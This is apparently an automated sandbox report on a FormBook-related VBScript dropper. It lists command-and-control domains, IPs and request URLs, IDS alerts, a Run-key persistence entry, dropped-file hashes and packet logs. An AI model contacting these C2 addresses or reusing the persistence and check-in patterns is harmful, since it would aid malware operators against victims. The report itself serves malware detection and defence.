                                                                                                                		lakeviewautomation.comCanada
                                                                                                                		16276OVHFRtrue
                                                                                                                217.160.0.37
                                                                                                                		www.grenoble-informatique.comGermany
                                                                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                194.102.227.30
                                                                                                                		cutgang.netRomania
                                                                                                                		12302VODAFONE_ROCharlesdeGaullenr15ROtrue
                                                                                                                173.255.194.134
                                                                                                                		www.thejointcomission.orgUnited States
                                                                                                                		63949LINODE-APLinodeLLCUStrue
                                                                                                                217.160.0.64
                                                                                                                		www.performingartshub.co.ukGermany
                                                                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                192.154.231.174
                                                                                                                		sciencevale.xyzUnited States
                                                                                                                		40676AS40676UStrue
                                                                                                                172.217.18.1
                                                                                                                		googlehosted.l.googleusercontent.comUnited States
                                                                                                                		15169GOOGLEUSfalse
                                                                                                                185.215.4.36
                                                                                                                		gargaloid.ruDenmark
                                                                                                                		50129TVHORADADAEStrue
                                                                                                                188.114.97.3
                                                                                                                		www.otopodlogi.comEuropean Union
                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                208.91.197.91
                                                                                                                		www.brothersbears.comVirgin Islands (BRITISH)
                                                                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                147.92.47.182
                                                                                                                		p102vty.yb559.comHong Kong
                                                                                                                		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue
                                                                                                                198.251.81.247
                                                                                                                		dachmotors.comUnited States
                                                                                                                		53667PONYNETUStrue
                                                                                                                103.191.208.50
                                                                                                                		treebarktees.comunknown
                                                                                                                		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                75.102.22.168
                                                                                                                		hotelyeah.topUnited States
                                                                                                                		23352SERVERCENTRALUStrue
                                                                                                                162.241.225.69
                                                                                                                		flyshareinc.comUnited States
                                                                                                                		46606UNIFIEDLAYER-AS-1UStrue

                                                                                                                Private

                                                                                                                IP
                                                                                                                192.168.11.1

                                                                                                                General Information

                                                                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                Analysis ID:806416
                                                                                                                Start date and time:2023-02-13 18:55:56 +01:00
                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                Overall analysis duration:0h 16m 34s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                Run name:Suspected Instruction Hammering
                                                                                                                Number of analysed new started processes analysed:33
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:1
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • HDC enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample file name:cnf13429226.vbs
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.rans.troj.spyw.evad.winVBS@27/4@21/17
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 66.7%
                                                                                                                HDC Information:
                                                                                                                • Successful, ratio: 3.3% (good quality ratio 3%)
                                                                                                                • Quality average: 66.9%
                                                                                                                • Quality standard deviation: 27.9%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 58
                                                                                                                • Number of non-executed functions: 242
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .vbs
                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 8272 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                18:59:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 88XDM26 C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                                                                18:59:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 88XDM26 C:\Program Files (x86)\internet explorer\ielowutil.exe

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                142.44.131.177file.exeGet hashmaliciousBrowse
                                                                                                                • www.lakeviewautomation.com/czni/?Bqhu_=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1cUEOcbTli2LCboA==&8ILHe=fwV5A
                                                                                                                0900664 MOHS Tender..jsGet hashmaliciousBrowse
                                                                                                                • www.lakeviewautomation.com/czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE
                                                                                                                217.160.0.3750415 MAITE GISTAU-pdf.vbsGet hashmaliciousBrowse
                                                                                                                • www.grenoble-informatique.com/egsw/?Papk-b=qMGQG4jxnNCQpO17JLRfMybBylApPZmoWmtCY130awi9b3rQPbK12BQYEL58t6pOC2J6vDb5yNaJ6JZFOGxbT0nf++MZijoK4w==&TZZZw=5IMNFV
                                                                                                                Factura de venta 0A23000704_pdf.vbsGet hashmaliciousBrowse
                                                                                                                • www.grenoble-informatique.com/egsw/?0cnW=SYiyFE4YJaw0&YqZ=qMGQG4jxnNCQpO17JLRfMybBylApPZmoWmtCY130awi9b3rQPbK12BQYEL58t6pOC2J6vDb5yNaJ6JZFOGxbT0nf++MZijoK4w==
                                                                                                                cnf13429226.vbsGet hashmaliciousBrowse
                                                                                                                • www.grenoble-informatique.com/gant/?jTMFC=KeFyNDFPd51KOrwqDT9o6uqGFAtEqdbrvBd+fy8vEv+qku4csGUmCd6H5Zu3p+C0g1qp/ru+f0evt5QFa0SxdZMMqcbjjwFZvw==&1jmla=G0qVB5
                                                                                                                Q7cVdPwoUI.exeGet hashmaliciousBrowse
                                                                                                                • www.grenoble-informatique.com/tt0w/
                                                                                                                0210asas1lp.vbsGet hashmaliciousBrowse
                                                                                                                • www.grenoble-informatique.com/egsw/?YA=CqNBS-R&ppJE1s=qMGQG4jxnNCQpO17JLRfMybBylApPZmoWmtCY130awi9b3rQPbK12BQYEL58t6pOC2J6vDb5yNaJ6JZFOGxbT0nf++MZijoK4w==

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                www.performingartshub.co.ukRFQ_63542.exeGet hashmaliciousBrowse
                                                                                                                • 217.160.0.64
                                                                                                                PO__0285586.exeGet hashmaliciousBrowse
                                                                                                                • 217.160.0.64
                                                                                                                doc2023013099877730091113.pdf.exeGet hashmaliciousBrowse
                                                                                                                • 217.160.0.64
                                                                                                                www.otopodlogi.com212fb.exeGet hashmaliciousBrowse
                                                                                                                • 188.114.96.3
                                                                                                                Confirmation_10Feb2023_102510.exeGet hashmaliciousBrowse
                                                                                                                • 188.114.96.3
                                                                                                                PRICE ENQUIRY ENQ REF_PDF_____________________________.........exeGet hashmaliciousBrowse
                                                                                                                • 188.114.96.3
                                                                                                                AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exeGet hashmaliciousBrowse
                                                                                                                • 188.114.96.3
                                                                                                                www.thejointcomission.orgJOB 20230125 RFQ - TECHNOFITME.jsGet hashmaliciousBrowse
                                                                                                                • 72.14.178.174

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                OVHFRcontract 2.oneGet hashmaliciousBrowse
                                                                                                                • 51.81.109.178
                                                                                                                O p e n.batGet hashmaliciousBrowse
                                                                                                                • 51.81.109.178
                                                                                                                .exeGet hashmaliciousBrowse
                                                                                                                • 51.81.61.70
                                                                                                                TNT Original Invoice PDF.exeGet hashmaliciousBrowse
                                                                                                                • 51.75.209.245
                                                                                                                Inv0925480781 P.O19942077 Payment Request.emlGet hashmaliciousBrowse
                                                                                                                • 144.217.43.218
                                                                                                                L87ArD1SMk.exeGet hashmaliciousBrowse
                                                                                                                • 46.105.204.2
                                                                                                                TNT Original Invoice PDF.exeGet hashmaliciousBrowse
                                                                                                                • 51.75.209.245
                                                                                                                TNT Original Invoice PDF.exeGet hashmaliciousBrowse
                                                                                                                • 51.75.209.245
                                                                                                                https://bit.ly/3DRy2QTGet hashmaliciousBrowse
                                                                                                                • 91.121.34.231
                                                                                                                RFQ.exeGet hashmaliciousBrowse
                                                                                                                • 151.80.13.34
                                                                                                                NoyGB0EUDM.exeGet hashmaliciousBrowse
                                                                                                                • 198.50.154.90
                                                                                                                wSMegjZWSJ.elfGet hashmaliciousBrowse
                                                                                                                • 51.255.185.111
                                                                                                                log21.ppc.elfGet hashmaliciousBrowse
                                                                                                                • 91.134.253.115
                                                                                                                p5tvC44u30.exeGet hashmaliciousBrowse
                                                                                                                • 51.195.53.204
                                                                                                                log21.x86.elfGet hashmaliciousBrowse
                                                                                                                • 51.178.244.128
                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                • 51.161.104.92
                                                                                                                img Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                • 149.202.24.70
                                                                                                                Order specification.exeGet hashmaliciousBrowse
                                                                                                                • 198.50.252.64
                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                • 51.68.190.80
                                                                                                                AgreementCancelation_658277(Feb08).oneGet hashmaliciousBrowse
                                                                                                                • 146.59.43.159

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                7c49006f7f3884f9c9b05d53bbfbee2160610f2310e97.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                https://t.co/kVolpyNxzB?ssr=trueGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                http://advoarmy.com/Get hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                https://web.hummelgrp.org/?npty&qrc=jpaulk@savannahga.govGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                DETAILS AND INVOICES.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                https://web.hummelgrp.org/?npty&qrc=jpaulk@savannahga.govGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                Produkt nov#U00e9 objedn#U00e1vky.vbeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                draft_BL_132023.pdf.vbsGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                HSBC Payment Advice.com.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                Facturas Pagadas al Vencimiento_pdf.vbsGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                https://dr-btaheri.com/wp-includes/r/0NN2-RFSI1Q-LBC8/aHR0cHM6Ly9rY2F3c3Z3NTZ5NjNlMTU3Nzk0NTdjYS5zZWdvcGV0LnJ1LyNqaW1rZWF0aW5nQG5hbGNvcmVuZXJneS5jb20Get hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                Wyciag_01_08102045800000190201217926.exeGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                FACT63e64.msiGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                http://sf_rand_string_lowercaseTuesday,%20February%207,%202023umc@mne.pt.sf_rand_string_lowercase.31umc.9009l7y31ou76788yliotffghjhgjhhhhhjvjv00316868333556.68ghfhgfvg.931.ghidrapid.ro./#.aHR0cHM6Ly9zdXN0aW5hMTMucm8vaW5jbHVkZXMvd2ViIGRhdGEvbmV3aXA/ZT11bWNAbW5lLnB0Get hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                TUOPU GROUP - REQUEST FOR QUOTATION 201323948392 PDF.vbsGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1
                                                                                                                PO. No. DM223778 IMG.vbsGet hashmaliciousBrowse
                                                                                                                • 142.250.186.46
                                                                                                                • 172.217.18.1

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                Malicious:false
                                                                                                                Preview:@...e...........................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\11VFL0Jui

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                                                                Category:dropped
                                                                                                                Size (bytes):122880
                                                                                                                Entropy (8bit):1.1305327154874678
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                                                                MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                                                                SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                                                                SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                                                                SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hceucc0t.h4i.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmmjiyi1.kor.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:ASCII text, with CRLF line terminators
                                                                                                                Entropy (8bit):6.052756482261208
                                                                                                                TrID:
                                                                                                                  File name:cnf13429226.vbs
                                                                                                                  File size:351809
                                                                                                                  MD5:c2eefe9d7568dfb5a4866374dc419b32
                                                                                                                  SHA1:43d8b48d1df3e1cd8ce26b7ed0b4c18a1064c545
                                                                                                                  SHA256:fe3a7ef5452ba6c6ee5c91befa64de082031a2371ac932f1c8167f9390129acb
                                                                                                                  SHA512:a31810d6b55ba6b74d63d1c3ef96345c010913cbee8e77a7b389be40a5b1afb36175a98c573f74799ca08a9cd30b1031d583460ecc4406cbf2d502fff6b0bd42
                                                                                                                  SSDEEP:6144:4NINts34flwRD+xTSUgPebROB5ML34fxmOV69Po2keCtGmR:3NtGIxcjGLAgNo29I
                                                                                                                  TLSH:6774CF60A72815B10EBB5A2E81CF0A45F4E14E7B5021DC3D35B126F52B16FFB8A1B1F9
                                                                                                                  File Content Preview:Klunkestil1 = Now....on error resume next ..Redebonhaussmannizerudi = FileLen("phocaenina")....'cobaltamine FUGLELIV Parallelles185 Hoplomachos Forbehandlings Hydrotherapeutics254 Uncontinuously114 bredbaandskapacitet bruningen Misadjust151 Smagfulderes18

                                                                                                                  File Icon

                                                                                                                  Icon Hash:e8d69ece869a9ec4

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  192.168.11.20185.215.4.3649840802031453 02/13/23-18:59:45.026565TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.20185.215.4.36
                                                                                                                  192.168.11.20185.215.4.3649840802031412 02/13/23-18:59:45.026565TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.20185.215.4.36
                                                                                                                  192.168.11.20103.191.208.5049851802031453 02/13/23-19:00:34.698267TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985180192.168.11.20103.191.208.50
                                                                                                                  192.168.11.20208.91.197.9149875802031412 02/13/23-19:01:51.132485TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987580192.168.11.20208.91.197.91
                                                                                                                  192.168.11.20147.92.47.18249888802031412 02/13/23-19:02:32.963635TCP2031412ET TROJAN FormBook CnC Checkin (GET)4988880192.168.11.20147.92.47.182
                                                                                                                  192.168.11.20208.91.197.9149875802031453 02/13/23-19:01:51.132485TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987580192.168.11.20208.91.197.91
                                                                                                                  192.168.11.20103.191.208.5049851802031412 02/13/23-19:00:34.698267TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985180192.168.11.20103.191.208.50
                                                                                                                  192.168.11.20147.92.47.18249888802031453 02/13/23-19:02:32.963635TCP2031453ET TROJAN FormBook CnC Checkin (GET)4988880192.168.11.20147.92.47.182
                                                                                                                  192.168.11.20103.191.208.5049916802031453 02/13/23-19:05:19.753523TCP2031453ET TROJAN FormBook CnC Checkin (GET)4991680192.168.11.20103.191.208.50
                                                                                                                  192.168.11.20103.191.208.5049916802031412 02/13/23-19:05:19.753523TCP2031412ET TROJAN FormBook CnC Checkin (GET)4991680192.168.11.20103.191.208.50
                                                                                                                  192.168.11.20208.91.197.9149875802031449 02/13/23-19:01:51.132485TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987580192.168.11.20208.91.197.91
                                                                                                                  192.168.11.20173.255.194.13449893802031453 02/13/23-19:02:46.627311TCP2031453ET TROJAN FormBook CnC Checkin (GET)4989380192.168.11.20173.255.194.134
                                                                                                                  192.168.11.20147.92.47.18249888802031449 02/13/23-19:02:32.963635TCP2031449ET TROJAN FormBook CnC Checkin (GET)4988880192.168.11.20147.92.47.182
                                                                                                                  192.168.11.20173.255.194.13449893802031412 02/13/23-19:02:46.627311TCP2031412ET TROJAN FormBook CnC Checkin (GET)4989380192.168.11.20173.255.194.134
                                                                                                                  192.168.11.20217.160.0.6449870802031412 02/13/23-19:01:37.803877TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987080192.168.11.20217.160.0.64
                                                                                                                  192.168.11.20217.160.0.6449870802031453 02/13/23-19:01:37.803877TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987080192.168.11.20217.160.0.64
                                                                                                                  192.168.11.20185.215.4.3649904802031449 02/13/23-19:04:45.806905TCP2031449ET TROJAN FormBook CnC Checkin (GET)4990480192.168.11.20185.215.4.36
                                                                                                                  192.168.11.20185.215.4.3649840802031449 02/13/23-18:59:45.026565TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.20185.215.4.36
                                                                                                                  192.168.11.20103.191.208.5049851802031449 02/13/23-19:00:34.698267TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985180192.168.11.20103.191.208.50
                                                                                                                  192.168.11.20217.160.0.6449870802031449 02/13/23-19:01:37.803877TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987080192.168.11.20217.160.0.64
                                                                                                                  192.168.11.20103.191.208.5049916802031449 02/13/23-19:05:19.753523TCP2031449ET TROJAN FormBook CnC Checkin (GET)4991680192.168.11.20103.191.208.50
                                                                                                                  192.168.11.201.1.1.155105532023883 02/13/23-19:02:09.891653UDP2023883ET DNS Query to a *.top domain - Likely Hostile5510553192.168.11.201.1.1.1
                                                                                                                  192.168.11.20173.255.194.13449893802031449 02/13/23-19:02:46.627311TCP2031449ET TROJAN FormBook CnC Checkin (GET)4989380192.168.11.20173.255.194.134
                                                                                                                  192.168.11.20185.215.4.3649904802031453 02/13/23-19:04:45.806905TCP2031453ET TROJAN FormBook CnC Checkin (GET)4990480192.168.11.20185.215.4.36
                                                                                                                  192.168.11.20185.215.4.3649904802031412 02/13/23-19:04:45.806905TCP2031412ET TROJAN FormBook CnC Checkin (GET)4990480192.168.11.20185.215.4.36

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Feb 13, 2023 18:58:08.600989103 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.601108074 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:08.601413965 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.605992079 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.606070042 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:08.650346994 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:08.650557995 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.650558949 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.651277065 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:08.651523113 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.725229979 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.725334883 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:08.726396084 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:08.726617098 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.729357958 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:08.772505045 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.089114904 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.089328051 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:09.089375019 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.089617014 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:09.090429068 CET49825443192.168.11.20142.250.186.46
                                                                                                                  Feb 13, 2023 18:58:09.090501070 CET44349825142.250.186.46192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.140053988 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.140186071 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.140409946 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.140794992 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.140870094 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.203042984 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.203262091 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.203262091 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.204992056 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.205238104 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.209084988 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.209127903 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.209713936 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.209980011 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.210242987 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.252485991 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.404211044 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.404403925 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.404619932 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.404943943 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.405497074 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.405704021 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.405704021 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.405704975 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.406130075 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.406280994 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.406281948 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.406330109 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.406382084 CET44349826172.217.18.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.406501055 CET49826443192.168.11.20172.217.18.1
                                                                                                                  Feb 13, 2023 18:58:09.406567097 CET44349826172.217.18.1192.168.11.20
